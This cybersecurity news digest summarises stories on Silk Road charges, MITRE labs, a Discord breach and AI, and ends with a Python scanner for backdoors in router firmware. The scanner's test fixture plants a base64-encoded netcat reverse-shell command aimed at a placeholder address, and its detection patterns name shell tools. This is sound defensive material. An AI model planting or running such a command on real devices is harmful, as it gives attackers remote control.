Analyst Comments: The charges against James Ellingson highlight the continued efforts of law enforcement to hold individuals accountable for their activities on darknet marketplaces. The case serves as a reminder of the illicit activities that occurred on Silk Road and the potential consequences for those involved. It also underscores the use of cryptocurrencies, such as Bitcoin, in facilitating illegal transactions. The DOJ's action demonstrates its commitment to pursuing cybercriminals involved in drug trafficking and other illicit activities.
FROM THE MEDIA: The Department of Justice (DOJ) has brought new charges against James Ellingson, a scammer on the Silk Road marketplace, for allegedly selling drugs and scamming Silk Road's founder. Ellingson, using various account names, sold a range of narcotics in exchange for Bitcoin. He is also accused of defrauding Ross Ulbricht by offering fake assassinations and receiving large payments for them. Ellingson faces charges of narcotics trafficking conspiracy, narcotics importation conspiracy, and money laundering conspiracy. The DOJ's move is seen as a way to tie up loose ends in the Silk Road investigation.
READ THE STORY: The Record
Inside the cybersecurity labs protecting U.S. critical infrastructure
Analyst Comments: The work being done at MITRE's labs is crucial given the escalating threats to critical infrastructure from both state-sponsored and criminal hacking groups. These threats have been growing in sophistication and frequency, making the research and development work in these labs even more important. By exploring the vulnerabilities of outdated physical components within critical infrastructure, and how these vulnerabilities may be exploited as operators integrate modern technologies and cloud-based storage onto these parts, MITRE is tackling an often-overlooked aspect of cybersecurity. Tools such as Caldera for operational technology systems, which allows infrastructure operators to simulate cyberattacks on their own systems, are vital for strengthening defenses and preparing for potential breaches.
FROM THE MEDIA: MITRE Corp, a not-for-profit organization that develops technology and security tools, has opened its research and development labs in Northern Virginia for a press tour, showcasing the important research being conducted to protect the nation’s critical infrastructure from cyberattacks. The tour included the Cyber Infrastructure Protection Innovation Center, the Cyber Innovations Lab, and the Integration, Demonstration, and Experimentation for Aeronautics (IDEA) Lab. These labs are developing tools and conducting simulations to help improve the security of critical infrastructure, such as utilities, hospitals, and transport systems.
READ THE STORY: Axios
With AI hype driving up server GPU prices, will cloud costs rise next?
Analyst Comments: The article provides a valuable perspective on the impact of AI development on the data center industry, particularly in terms of the demand and pricing of GPUs. It highlights a significant challenge in the AI sector - the high computational requirements of machine learning and the associated cost implications. As AI models become more complex, the demand for GPUs and similar accelerators is expected to continue growing, potentially exacerbating the supply-demand imbalance. The predicted increase in cloud GPU costs could have significant implications for companies relying on cloud services for their AI workloads. This could potentially create barriers for smaller businesses and start-ups that may struggle with increased operational costs.
FROM THE MEDIA: The article by Timothy Prickett Morgan discusses the skyrocketing demand for machine-learning accelerators, particularly GPUs, which are essential for training, testing, and running AI models. This demand surge is causing GPU prices to increase substantially, with top-end Nvidia models selling for up to $40,000 each. The situation is likened to the used car market in the US, characterized by high demand and insufficient supply. This trend is causing cloud service providers and hyperscalers to ration GPU access among their developers, and cloud GPU cost increases are anticipated. The article also mentions a discussion about the reasons behind the choice of certain locations for data center construction, cooling technologies, constraints for large language models, and the hardware requirements for recommendation systems.
READ THE STORY: The Register
Discord discloses data breach after support agent got hacked
Analyst Comments: This data breach is a significant incident given the popularity of Discord and the potential sensitivity of the exposed information, especially email addresses and support messages. It highlights the risks associated with third-party access and the importance of robust security measures across all users with access to sensitive information. Despite Discord's swift response, the incident may negatively impact user trust in the platform's security measures. The fact that the compromised account belonged to a third-party support agent underlines the importance of ensuring security protocols are enforced not only internally but also among partners and third-party vendors. It's a reminder for all organizations to assess their cybersecurity posture regularly and monitor all users with access to sensitive data.
FROM THE MEDIA: Discord, a popular instant messaging and social media platform with 150 million monthly active users, suffered a data breach after a third-party support agent's account was compromised. The breach exposed the agent's support ticket queue, which contained user email addresses, messages exchanged with Discord support, and any attachments sent with the tickets. Once the breach was discovered, Discord immediately disabled the compromised account and ran malware checks on the affected machine. Although Discord considers the risk minimal, it has advised affected users to be vigilant for any suspicious activity, such as fraud or phishing attempts.
READ THE STORY: Bleeping Computer
The threat and promise of artificial intelligence
Analyst Comments: The article provides a comprehensive exploration of the potential impacts of AI on our society, both in economic and social terms. It raises important questions about how we can navigate these challenges, particularly the potential displacement of jobs and the existential questions about human identity and society. The comparison to the decline of horses in the UK as working animals is a powerful analogy that underscores the potential magnitude of the changes AI might bring. The article also highlights the potential benefits of AI, including increased productivity and the creation of new job categories. This balanced view helps to provide a nuanced understanding of the issues at hand. The challenge of regulating AI is accurately depicted in the article. Given AI's wide-ranging applications and impacts, creating effective policies and regulations will require a concerted, multi-disciplinary effort. It's clear that ongoing discussions and research in this area are critical to ensure the responsible and ethical use of AI.
FROM THE MEDIA: The article discusses the potential impact of artificial intelligence (AI) on society, comparing the decline of horses in the UK as working animals to the potential decline of human labor due to AI advancements. It discusses the implications of AI for jobs and productivity, revealing that AI and automation have led to the loss of middle-income jobs while creating new job specialties. The article predicts that up to 18% of jobs could be automated globally in the future, with white-collar workers being particularly vulnerable. Beyond economic effects, AI also raises existential questions about human identity and the structure of society. It could lead to more rational systems but could also promote disinformation, increase monopoly power, enable invasive surveillance, and potentially manipulate democratic processes. The article concludes by stating that regulating AI is challenging due to its vast scope and influence and highlights the urgent need to understand its potential harms.
READ THE STORY: FT
Items of interest
US Debt Ceiling Looms Over Biden’s Foreign Trips
Analyst Comments: The current deadlock over the U.S. debt ceiling poses a significant risk to President Biden's foreign policy agenda. The potential cancellation or alteration of his physical presence at the G-7 and Quad meetings could undermine the perceived strength and reliability of the United States as a global actor, especially at a time when geopolitical competition with China is intensifying. The G-7 summit is particularly significant as it focuses on countering China's economic coercion and supporting Ukraine's defense against Russia. Biden's absence might be interpreted as a lack of commitment or capability in dealing with these major global issues. Furthermore, the symbolism of a U.S. president's presence in Hiroshima, given its historical significance, could be lost.
FROM THE MEDIA: The ongoing deadlock between the White House and congressional Republicans regarding the increase of the US debt ceiling could impact President Biden's upcoming meetings with allies in Japan and Australia. Biden is expected to attend the G-7 summit in Hiroshima, Japan, on May 17, and the Quad Summit in Sydney, Australia, on May 22. These meetings are seen as crucial for deepening cooperation on regional challenges and countering China’s influence. However, Biden stated that resolving the debt ceiling issue is the top priority on his agenda and he might have to attend the summits virtually or not at all, depending on the state of these negotiations. G-7 leaders will focus on countering Beijing’s economic coercion, supporting Ukraine's defense against Russia, and discussing nuclear disarmament and non-proliferation. In Papua New Guinea, Biden will meet with Pacific Island Forum leaders to establish stronger strategic ties and discourage them from making security deals with China. The Quad Summit will aim to bolster economic and security relations among the US, Japan, India, and Australia.
READ THE STORY: VOA
Getting Started in Firmware Analysis & IoT Reverse Engineering (Video)
FROM THE MEDIA: The speaker expresses their desire to learn more about these subjects and mentions the complexity of the technology, engineering, and hardware hacking involved in smart devices. They highlight the importance of security in IoT and the potential vulnerabilities present in outdated and legacy technologies. The speaker then proceeds to demonstrate a practical example of reverse engineering firmware for a TP-Link router using tools like binwalk and explores the extracted file system to identify potential vulnerabilities and default settings. They also mention the option of manually analyzing the binaries using disassemblers or debuggers. Later in the transcript, the speaker introduces a sponsor called Bug Proof, which offers a platform for IoT security research and automated analysis of firmware.
IoT Security Find Vulnerabilities and Backdoor In Firmware (Video)
FROM THE MEDIA: In the video, the presenter discusses IoT security and router analysis. They focus on performing firmware analysis to identify potential network attacks and vulnerabilities in routers. The attacker may plant malicious firmware with a backdoor connection to gain remote access to the routers. The presenter demonstrates the use of tools like binwalk to extract the firmware and explores different directories for sensitive information. They highlight the importance of examining files such as config and init.d for potential network-related vulnerabilities. Specifically, they analyze a file called "firewall" and decode a base64-encoded value to reveal a modified command for creating a reverse shell using Netcat.
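As an added example (not code from either video), the Python below automates the inspection both talks describe: it walks the startup and config directories of an extracted rootfs (such as the output of binwalk), decodes base64-looking tokens, and flags any that decode to a netcat-style reverse-shell command. The sample rootfs, its encoded value, and the TEST-NET address are constructed for the demonstration.

```python
import base64
import os
import re
import tempfile

# Startup and config directories of an extracted rootfs, where a planted hook is likely to live.
SCAN_DIRS = ("etc/init.d", "etc/config", "etc/rc.d")
# Base64-looking tokens: long runs of the alphabet with optional trailing padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Decoded text indicative of a netcat-style reverse shell or a fetch-and-run chain.
SUSPICIOUS_RE = re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ec]\s*/bin/|/dev/tcp/|\b(wget|curl)\b.*\|\s*sh\b")

def decode_candidates(text):
    """Yield (blob, decoded_text) for each base64-looking token that decodes to clean text."""
    for match in B64_RE.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded = raw.decode("utf-8")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield blob, decoded

def scan_rootfs(root):
    """Return [(relative_path, decoded_command)] for encoded values matching SUSPICIOUS_RE."""
    findings = []
    for rel in SCAN_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, rel)):
            for name in files:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
                for _blob, decoded in decode_candidates(text):
                    if SUSPICIOUS_RE.search(decoded):
                        findings.append((os.path.relpath(path, root), decoded.strip()))
    return findings

def build_sample_rootfs():
    """Constructed sample rootfs: a clean init script and a 'firewall' script hiding an encoded netcat command."""
    root = tempfile.mkdtemp(prefix="rootfs_")
    init_d = os.path.join(root, "etc", "init.d")
    os.makedirs(init_d)
    # Constructed payload; 203.0.113.10 is a TEST-NET address, not a real host.
    encoded = base64.b64encode(b"nc 203.0.113.10 4444 -e /bin/sh").decode("ascii")
    with open(os.path.join(init_d, "firewall"), "w") as fh:
        fh.write(f"#!/bin/sh\niptables -F\nRULE={encoded}\n")
    with open(os.path.join(init_d, "network"), "w") as fh:
        fh.write("#!/bin/sh\nifconfig br-lan 192.168.1.1 netmask 255.255.255.0\n")
    return root
```

Point `scan_rootfs()` at the directory binwalk extracted (for example `_firmware.bin.extracted/squashfs-root`) to run it against real firmware; any hit should then be confirmed by reading the surrounding script.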
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.